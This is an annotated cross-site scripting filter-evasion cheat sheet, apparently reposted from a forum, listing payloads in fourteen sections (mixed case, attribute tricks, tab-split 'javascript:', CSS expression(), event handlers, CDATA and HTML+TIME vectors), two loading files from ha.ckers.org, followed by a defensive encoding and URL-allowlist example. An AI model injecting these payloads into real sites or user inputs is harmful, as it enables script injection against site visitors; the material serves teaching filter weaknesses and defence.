1. Change the case of characters

A filter that matches "<script" case-sensitively is beaten by mixed case; HTML tag and attribute names are case-insensitive, so the browser runs it anyway.

<sCript>alert('d')</scRipT>
2. Add extra characters to evade a regular-expression check

A quote or ">" placed inside an attribute value defeats a regex that assumes the first ">" closes the tag or that quotes pair up; the doubled "<" in the first line defeats engines that pair up angle brackets and then compare the tag name in between.

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use an extension other than .js

The extension in the URL is irrelevant: the browser runs whatever the response body is as JavaScript. What matters is the body and its Content-Type, which a filter that looks at the file name never sees.

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

A stylesheet URL is rarely filtered, and old browsers (IE and early Netscape) executed javascript: URLs that appeared inside CSS url(); current browsers do not.

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

Example xss.css:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert other characters inside the script tag

The HTML tokenizer treats "/" between the tag name and the attributes like whitespace, so a regex that expects "<script" followed by a space never sees these, while the browser still reads a script tag with a src attribute.

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade the filter

The gap inside "javascript" in each line below was a tab or a newline character in the original post (the board has rendered it as a space). Browsers drop tab, LF and CR from a URL before reading the scheme, so the attribute still resolves to javascript:, while a filter looking for the literal string "javascript:" never matches.

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">
7. Use "\" to evade

In CSS a backslash before a non-hex character is an escape for that character, and /* */ comments are dropped by the tokenizer, so "expre\ssi\on" and "expr/*anyword*/ession" both reach the engine as "expression". The expression() examples only work in Internet Explorer (dynamic properties, dropped in IE8 standards mode).

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

The payload is written with HTML numeric character references (&#x6A; for "j" and so on) or CSS hex escapes (\6A); the browser decodes them, and it still accepts a numeric reference with no terminating ";", which is what the note about dropping ";" refers to. The encoded form of each example was decoded by the board's renderer, so only the decoded source survives here:

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

Any event-handler attribute will do, so a filter has to treat every on* attribute as code rather than enumerate names. This list is from the IE era and includes many attributes only IE supported:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

AllowScriptAccess="always" lets the Flash movie call into the page's JavaScript. Flash has been removed from current browsers, so this is a legacy vector.

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and let the browser reassemble it

An XML data island is bound into the SPAN with DATAFORMATAS=HTML; the adjacent CDATA sections (or the comment in the second example) are joined when the field is rendered, so "javas" and "cript:" only become javascript: after the filter has already looked at the page. Data islands and DATASRC binding are Internet Explorer only.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

Internet Explorer's HTML+TIME behaviour lets t:set assign an attribute after load; here it writes innerHTML, and the DEFER script inside the new markup runs. Because the markup sits inside the to attribute, it is entity-encoded (&lt;SCRIPT DEFER&gt; ...) in the actual payload.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Set a cookie via META

The cookie value only becomes XSS when the application later reflects it unescaped; current browsers also ignore Set-Cookie given through a META tag.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

Of these, only the navigation contexts (IFRAME and FRAME SRC, and A HREF) still execute javascript: URLs in current browsers; the rest are legacy vectors from IE and early Netscape.

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
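The defence that sections 9 and 14 do not get around, as an added example that is not part of the original post: instead of searching input for bad strings, the output is built per context. Text and attribute values are entity-encoded, and URL-valued attributes (src, href) accept only an allow-listed scheme, read after the URL is cleaned the way browsers clean it (leading control characters and spaces dropped, tab/LF/CR removed anywhere, scheme compared case-insensitively), which is what the tab/newline payloads in section 6 rely on. The encoder, the scheme allowlist, the render helpers and the sample inputs are my assumptions; the inputs are constructed from the post's payloads.

```javascript
// Added example, not code from the original post. The construction-side
// defence that sections 9 and 14 do not get around: rather than searching
// input for bad strings, output is built per context. Text and attribute
// values are entity-encoded, and URL-valued attributes (src, href) accept only
// an allow-listed scheme, read after the URL is cleaned the way browsers clean
// it (leading C0 controls and spaces dropped, tab/LF/CR removed anywhere, the
// scheme compared case-insensitively), which is what the tab/newline payloads
// in section 6 rely on. Sample inputs are constructed from the post's payloads.

function escapeHtml(s) {
  // One encoder for text nodes and double-quoted attribute values.
  return String(s).replace(/[&<>"'`]/g, (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Returns the URL to emit, or null when it must be dropped.
function safeUrl(raw) {
  const cleaned = String(raw).replace(/^[\x00-\x20]+/, '').replace(/[\t\n\r]/g, '');
  const head = cleaned.split(/[\/?#]/, 1)[0];         // everything before path/query/fragment
  if (!head.includes(':')) return cleaned;            // relative URL: resolves on our own origin
  const scheme = head.slice(0, head.indexOf(':') + 1).toLowerCase();
  return ALLOWED_SCHEMES.has(scheme) ? cleaned : null; // javascript:, data:, vbscript: all fall here
}

function renderImage(src, alt) {
  const url = safeUrl(src);
  return url === null
    ? `<img alt="${escapeHtml(alt)}">`                // attacker URL dropped, not "cleaned"
    : `<img src="${escapeHtml(url)}" alt="${escapeHtml(alt)}">`;
}

function renderLink(href, text) {
  const url = safeUrl(href);
  const label = escapeHtml(text);
  return url === null ? label : `<a href="${escapeHtml(url)}">${label}</a>`;
}

function renderComment(text) {
  // Section 9's <body onload=...> becomes inert text here.
  return `<p>${escapeHtml(text)}</p>`;
}

// Constructed inputs taken from the post's vectors plus one benign case each.
const SAMPLES = {
  eventHandler: "<body onload=\"alert('onload')\">",
  imgJs: "javascript:alert('XSS3')",
  imgJsTab: "jav\tascr\nipt:alert('XSS3')",
  imgJsCase: "  JaVaScRiPt:alert(1)",
  imgOk: 'https://example.com/a.png',
  hrefJs: "javascript:alert('13')",
  hrefOk: '/profile?id=1',
};

function demo() {
  return {
    comment: renderComment(SAMPLES.eventHandler),
    imgJs: renderImage(SAMPLES.imgJs, 'x'),
    imgJsTab: renderImage(SAMPLES.imgJsTab, 'x'),
    imgJsCase: renderImage(SAMPLES.imgJsCase, 'x'),
    imgOk: renderImage(SAMPLES.imgOk, 'a"b'),
    hrefJs: renderLink(SAMPLES.hrefJs, 'click'),
    hrefOk: renderLink(SAMPLES.hrefOk, 'me'),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The point of the allowlist is that nothing has to recognise "javascript:" in any of its spellings: a scheme that is not http, https or mailto is dropped whatever it is. Note what this does not cover: the style attribute, data islands and HTML+TIME in sections 7, 11 and 12 are contexts that should never receive attacker-controlled data at all, because there is no encoding that makes CSS or binding markup safe.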